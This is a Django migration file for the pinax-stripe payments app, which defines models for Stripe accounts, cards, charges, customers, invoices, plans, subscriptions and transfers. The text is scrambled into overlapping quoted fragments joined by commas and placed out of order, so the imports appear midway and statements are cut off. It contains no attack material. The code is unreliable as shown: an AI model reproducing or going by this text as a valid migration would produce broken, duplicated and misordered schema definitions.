null=True)), ('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual', 'manual'), ('Daily',", "('refund_address', models.TextField(blank=True)), ('uncaptured_funds', models.BooleanField(default=False)), ('used_for_payment', models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel(", "decimal_places=2, max_digits=9, null=True)), ('fee_currency', models.CharField(blank=True, max_length=10, null=True)), ('transfer_group', models.TextField(blank=True, null=True)), ('outcome', jsonfield.fields.JSONField(blank=True, null=True)),", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('business_name', models.TextField(blank=True, null=True)), ('business_url', models.TextField(blank=True, null=True)),", "jsonfield.fields.JSONField(blank=True, null=True)), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Coupon', fields=[", "models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent', models.DecimalField(blank=True, decimal_places=2, default=None, max_digits=3, null=True)), ('cancel_at_period_end', models.BooleanField(default=False)), ('canceled_at',", "to='pinax_stripe.Customer')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ),", "models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('source', models.CharField(blank=True, max_length=100)), ('currency', models.CharField(default='usd', max_length=10)), ('amount', models.DecimalField(blank=True, decimal_places=2,", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='Event', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "decimal_places=2, default=None, max_digits=3, null=True)), ('cancel_at_period_end', models.BooleanField(default=False)), ('canceled_at', models.DateTimeField(blank=True, null=True)), ('current_period_end', models.DateTimeField(blank=True, null=True)), ('current_period_start',", "null=True)), ('charges_enabled', models.BooleanField(default=False)), ('country', models.CharField(max_length=2)), ('debit_negative_balances', models.BooleanField(default=False)), ('decline_charge_on_avs_failure', models.BooleanField(default=False)), ('decline_charge_on_cvc_failure', models.BooleanField(default=False)), ('default_currency', models.CharField(max_length=3)),", "models.NullBooleanField()), ('refunded', models.NullBooleanField()), ('captured', models.NullBooleanField()), ('receipt_sent', models.BooleanField(default=False)), ('charge_created', models.DateTimeField(blank=True, null=True)), ('available', models.BooleanField(default=False)), ('available_on',", "('duration_in_months', models.PositiveIntegerField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('max_redemptions', models.PositiveIntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('percent_off', models.PositiveIntegerField(blank=True,", "models.DecimalField(decimal_places=2, max_digits=9)), ('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)), ('bitcoin_amount', models.PositiveIntegerField()), ('bitcoin_amount_received', models.PositiveIntegerField(default=0)), ('bitcoin_uri', models.TextField(blank=True)), ('currency',", "('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('kind', models.CharField(blank=True, max_length=25)), ('period_start', models.DateTimeField()), ('period_end', models.DateTimeField()),", "models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_reversed', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('application_fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9,", "models.TextField(blank=True, null=True)), ('country', models.TextField()), ('currency', models.TextField()), ('default_for_currency', models.BooleanField(default=False)), ('fingerprint', models.TextField()), ('last4', models.CharField(max_length=4)), ('metadata',", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_off', models.DecimalField(blank=True, decimal_places=2,", "('amount_reversed', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('application_fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('created', models.DateTimeField(blank=True, null=True)),", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name', models.TextField()),", "options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Coupon', fields=[ ('id', models.CharField(editable=False, max_length=32,", "models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('amount_refunded', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('description', models.TextField(blank=True)), ('paid', models.NullBooleanField()),", "on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, },", "null=True)), ('fee_currency', models.CharField(blank=True, max_length=10, null=True)), ('transfer_group', models.TextField(blank=True, null=True)), ('outcome', jsonfield.fields.JSONField(blank=True, null=True)), ], options={", "models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='InvoiceItem',", "max_length=10)), ('closed', models.BooleanField(default=False)), ('description', models.TextField(blank=True)), ('paid', models.BooleanField(default=False)), ('receipt_number', models.TextField(blank=True)), ('period_end', models.DateTimeField()), ('period_start', models.DateTimeField()),", "models.TextField()), ('last4', models.CharField(max_length=4)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('routing_number', models.TextField()), ('status', models.TextField()), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts',", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent', models.DecimalField(blank=True,", "('stripe_id', models.CharField(max_length=191)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(max_length=15)), ('interval', models.CharField(max_length=15)), ('interval_count', models.IntegerField()),", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('source', models.CharField(blank=True, max_length=100)),", "to='pinax_stripe.Event')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Invoice', fields=[ ('id', models.CharField(editable=False, max_length=32,", "('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Invoice',", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('active', models.BooleanField(default=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_received',", "models.BooleanField(default=False)), ('fingerprint', models.TextField()), ('last4', models.CharField(max_length=4)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('routing_number', models.TextField()), ('status', models.TextField()), ('account',", "('kind', models.CharField(max_length=250)), ('livemode', models.BooleanField(default=False)), ('webhook_message', jsonfield.fields.JSONField()), ('validated_message', jsonfield.fields.JSONField(blank=True, null=True)), ('valid', models.NullBooleanField()), ('processed', models.BooleanField(default=False)),", "name='Coupon', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_off',", "}, ), migrations.CreateModel( name='Plan', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191)), ('created_at',", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent', models.DecimalField(blank=True, decimal_places=2, default=None,", "field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AddField( model_name='bitcoinreceiver', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AlterUniqueTogether( name='useraccount', unique_together=set([('user', 'account')]),", "models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_due', models.DecimalField(decimal_places=2, max_digits=9)), ('attempted', models.NullBooleanField()), ('attempt_count', models.PositiveIntegerField(blank=True, null=True)), ('statement_descriptor',", "models.DateTimeField(blank=True, null=True)), ('trial_start', models.DateTimeField(blank=True, null=True)), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')), ], options={", "models.TextField(blank=True, null=True)), ('reversed', models.BooleanField(default=False)), ('source_transaction', models.TextField(blank=True, null=True)), ('source_type', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)),", "related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)),", "models.IntegerField()), ('funding', models.CharField(max_length=15)), ('last4', models.CharField(blank=True, max_length=4)), ('fingerprint', models.TextField()), ], options={ 'abstract': False, },", "('valid', models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Customer', fields=[ ('id', models.CharField(editable=False,", "'abstract': False, }, ), migrations.CreateModel( name='Customer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_reversed',", "models.CharField(max_length=25)), ('transfer_group', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers', to='pinax_stripe.Event')),", "decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(blank=True, default='usd', max_length=10)), ('delinquent', models.BooleanField(default=False)), ('default_source', models.TextField(blank=True)), ('date_purged', models.DateTimeField(blank=True,", "models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract':", "('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_reversed', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('application_fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),", "'abstract': False, }, ), migrations.CreateModel( name='Event', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "editable=False, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),", "('routing_number', models.TextField()), ('status', models.TextField()), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')), ], options={ 'abstract': False, },", "('type', models.TextField(blank=True, null=True)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers', to='pinax_stripe.Event')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True,", "), migrations.CreateModel( name='BitcoinReceiver', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at',", "('product_description', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('support_email', models.TextField(blank=True, null=True)), ('support_phone', models.TextField(blank=True, null=True)), ('timezone',", "models.TextField(blank=True)), ('date_purged', models.DateTimeField(blank=True, editable=False, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ('user', models.OneToOneField(blank=True,", "null=True)), ('transfer_group', models.TextField(blank=True, null=True)), ('outcome', jsonfield.fields.JSONField(blank=True, null=True)), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin,", "field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='invoice', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ),", "import pinax.stripe.models class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations", "null=True)), ('created', models.DateTimeField(blank=True, null=True)), ('currency', models.CharField(default='usd', max_length=25)), ('date', models.DateTimeField()), ('description', models.TextField(blank=True, null=True)), ('destination',", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='TransferChargeFee', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "related_query_name='user_account', to='pinax_stripe.Customer')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)), ], ), migrations.AddField( model_name='invoiceitem', name='plan', field=models.ForeignKey(blank=True,", "('status', models.TextField()), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel(", "('country', models.TextField()), ('currency', models.TextField()), ('default_for_currency', models.BooleanField(default=False)), ('fingerprint', models.TextField()), ('last4', models.CharField(max_length=4)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)),", "migrations.CreateModel( name='Subscription', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "), migrations.AddField( model_name='bitcoinreceiver', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AlterUniqueTogether( name='useraccount', unique_together=set([('user', 'account')]), ), migrations.AlterUniqueTogether(", "('type', models.TextField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_publishable_key', models.CharField(blank=True, max_length=100, null=True)), ('product_description', models.TextField(blank=True, null=True)),", "max_digits=9, null=True)), ('amount_refunded', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('description', models.TextField(blank=True)), ('paid', models.NullBooleanField()), ('disputed', models.NullBooleanField()),", "models.DecimalField(decimal_places=2, max_digits=9)), ('attempted', models.NullBooleanField()), ('attempt_count', models.PositiveIntegerField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('closed',", "('Daily', 'daily'), ('Weekly', 'weekly'), ('Monthly', 'monthly')], max_length=7, null=True)), ('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_weekly_anchor', models.TextField(blank=True,", "max_length=10)), ('kind', models.CharField(blank=True, max_length=25)), ('period_start', models.DateTimeField()), ('period_end', models.DateTimeField()), ('proration', models.BooleanField(default=False)), ('line_type', models.CharField(max_length=50)), ('description',", "name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='invoice', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'),", "('funding', models.CharField(max_length=15)), ('last4', models.CharField(blank=True, max_length=4)), ('fingerprint', models.TextField()), ], options={ 'abstract': False, }, ),", "migrations.AddField( model_name='invoiceitem', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='invoice', name='subscription', field=models.ForeignKey(blank=True, null=True,", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('kind', models.CharField(max_length=250)), ('livemode', models.BooleanField(default=False)), ('webhook_message',", "migrations.CreateModel( name='TransferChargeFee', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd',", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='Plan', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "null=True)), ('current_period_end', models.DateTimeField(blank=True, null=True)), ('current_period_start', models.DateTimeField(blank=True, null=True)), ('ended_at', models.DateTimeField(blank=True, null=True)), ('quantity', models.IntegerField()), ('start',", "serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_reversed', models.DecimalField(blank=True, decimal_places=2, max_digits=9,", "models.CharField(blank=True, max_length=100, null=True)), ('product_description', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('support_email', models.TextField(blank=True, null=True)), ('support_phone',", "('canceled_at', models.DateTimeField(blank=True, null=True)), ('current_period_end', models.DateTimeField(blank=True, null=True)), ('current_period_start', models.DateTimeField(blank=True, null=True)), ('ended_at', models.DateTimeField(blank=True, null=True)), ('quantity',", "null=True)), ('type', models.TextField(blank=True, null=True)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers', to='pinax_stripe.Event')), ('stripe_account', models.ForeignKey(blank=True, default=None,", "('description', models.TextField(blank=True, null=True)), ('kind', models.CharField(max_length=150)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')), ], options={", "), migrations.CreateModel( name='Card', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at',", "('stripe_publishable_key', models.CharField(blank=True, max_length=100, null=True)), ('product_description', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('support_email', models.TextField(blank=True, null=True)),", "models.TextField(blank=True)), ('uncaptured_funds', models.BooleanField(default=False)), ('used_for_payment', models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Card',", "('fingerprint', models.TextField()), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Charge', fields=[ ('id', models.CharField(editable=False,", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='Customer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "'abstract': False, }, ), migrations.CreateModel( name='Invoice', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "models.TextField(blank=True, null=True)), ('support_phone', models.TextField(blank=True, null=True)), ('timezone', models.TextField(blank=True, null=True)), ('tos_acceptance_date', models.DateField(blank=True, null=True)), ('tos_acceptance_ip', models.TextField(blank=True,", "('last4', models.CharField(max_length=4)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('routing_number', models.TextField()), ('status', models.TextField()), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')),", "models.PositiveIntegerField()), ('bitcoin_amount_received', models.PositiveIntegerField(default=0)), ('bitcoin_uri', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('description', models.TextField(blank=True)), ('email', models.TextField(blank=True)), ('filled',", "models.CharField(default='usd', max_length=10)), ('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('amount_refunded', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('description',", "null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, },", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('active', models.BooleanField(default=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)), ('bitcoin_amount', models.PositiveIntegerField()),", "migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Account', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('active', models.BooleanField(default=False)), ('amount', models.DecimalField(decimal_places=2,", "null=True)), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Coupon', fields=[ ('id',", "models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_reversed', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('application_fee',", "null=True)), ('legal_entity_address_line2', models.TextField(blank=True, null=True)), ('legal_entity_address_postal_code', models.TextField(blank=True, null=True)), ('legal_entity_address_state', models.TextField(blank=True, null=True)), ('legal_entity_dob', models.DateField(blank=True, null=True)),", "('statement_descriptor', models.TextField(blank=True, null=True)), ('support_email', models.TextField(blank=True, null=True)), ('support_phone', models.TextField(blank=True, null=True)), ('timezone', models.TextField(blank=True, null=True)), ('tos_acceptance_date',", "model_name='card', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AddField( model_name='bitcoinreceiver', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AlterUniqueTogether( name='useraccount',", "models.TextField(blank=True, null=True)), ('legal_entity_address_country', models.TextField(blank=True, null=True)), ('legal_entity_address_line1', models.TextField(blank=True, null=True)), ('legal_entity_address_line2', models.TextField(blank=True, null=True)), ('legal_entity_address_postal_code', models.TextField(blank=True,", "null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'), ), migrations.AddField( model_name='invoiceitem', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField(", "django.db.models.deletion import django.utils.timezone import jsonfield.fields import pinax.stripe.models class Migration(migrations.Migration): initial = True dependencies", "to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='BitcoinReceiver', fields=[ ('id', models.CharField(editable=False, max_length=32,", "import django.utils.timezone import jsonfield.fields import pinax.stripe.models class Migration(migrations.Migration): initial = True dependencies =", "models.TextField()), ('currency', models.TextField()), ('default_for_currency', models.BooleanField(default=False)), ('fingerprint', models.TextField()), ('last4', models.CharField(max_length=4)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('routing_number',", "model_name='charge', name='customer', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'), ), migrations.AddField( model_name='charge', name='invoice', field=models.ForeignKey(blank=True, null=True,", "max_length=7, null=True)), ('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)), ('payout_statement_descriptor', models.TextField(blank=True, null=True)), ('payouts_enabled', models.BooleanField(default=False)),", "('address_line_1_check', models.CharField(max_length=15)), ('address_line_2', models.TextField(blank=True)), ('address_city', models.TextField(blank=True)), ('address_state', models.TextField(blank=True)), ('address_country', models.TextField(blank=True)), ('address_zip', models.TextField(blank=True)), ('address_zip_check',", "max_length=10, null=True)), ('transfer_group', models.TextField(blank=True, null=True)), ('outcome', jsonfield.fields.JSONField(blank=True, null=True)), ], options={ 'abstract': False, },", "migrations.CreateModel( name='EventProcessingException', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('data', models.TextField()), ('message', models.CharField(max_length=500)), ('traceback',", "('description', models.TextField(blank=True)), ('paid', models.BooleanField(default=False)), ('receipt_number', models.TextField(blank=True)), ('period_end', models.DateTimeField()), ('period_start', models.DateTimeField()), ('subtotal', models.DecimalField(decimal_places=2, max_digits=9)),", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='Card', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Event', fields=[ ('id',", "models.TextField(blank=True, null=True)), ('business_url', models.TextField(blank=True, null=True)), ('charges_enabled', models.BooleanField(default=False)), ('country', models.CharField(max_length=2)), ('debit_negative_balances', models.BooleanField(default=False)), ('decline_charge_on_avs_failure', models.BooleanField(default=False)),", "('quantity', models.IntegerField()), ('start', models.DateTimeField()), ('status', models.CharField(max_length=25)), ('trial_end', models.DateTimeField(blank=True, null=True)), ('trial_start', models.DateTimeField(blank=True, null=True)), ('customer',", "models.BooleanField(default=False)), ('source_transaction', models.TextField(blank=True, null=True)), ('source_type', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('status', models.CharField(max_length=25)), ('transfer_group',", "max_length=32, primary_key=True, serialize=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('application', models.TextField(blank=True, null=True)), ('description',", "pinax.stripe.models class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations =", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_balance', models.DecimalField(blank=True,", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,", "to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='customer', name='users', field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='charge', name='customer',", "unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('business_name', models.TextField(blank=True, null=True)), ('business_url', models.TextField(blank=True, null=True)), ('charges_enabled', models.BooleanField(default=False)), ('country', models.CharField(max_length=2)),", "migrations.CreateModel( name='Event', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "'abstract': False, }, ), migrations.CreateModel( name='BankAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "decimal import Decimal from django.conf import settings from django.db import migrations, models import", "max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('application', models.TextField(blank=True, null=True)), ('description', models.TextField(blank=True, null=True)), ('kind', models.CharField(max_length=150)), ('created_at',", "migrations.CreateModel( name='Charge', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_reversed', models.DecimalField(blank=True,", "), migrations.CreateModel( name='BankAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at',", "('used_for_payment', models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Card', fields=[ ('id', models.CharField(editable=False,", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('business_name', models.TextField(blank=True, null=True)), ('business_url',", "max_digits=9)), ('currency', models.CharField(max_length=15)), ('interval', models.CharField(max_length=15)), ('interval_count', models.IntegerField()), ('name', models.CharField(max_length=150)), ('statement_descriptor', models.TextField(blank=True)), 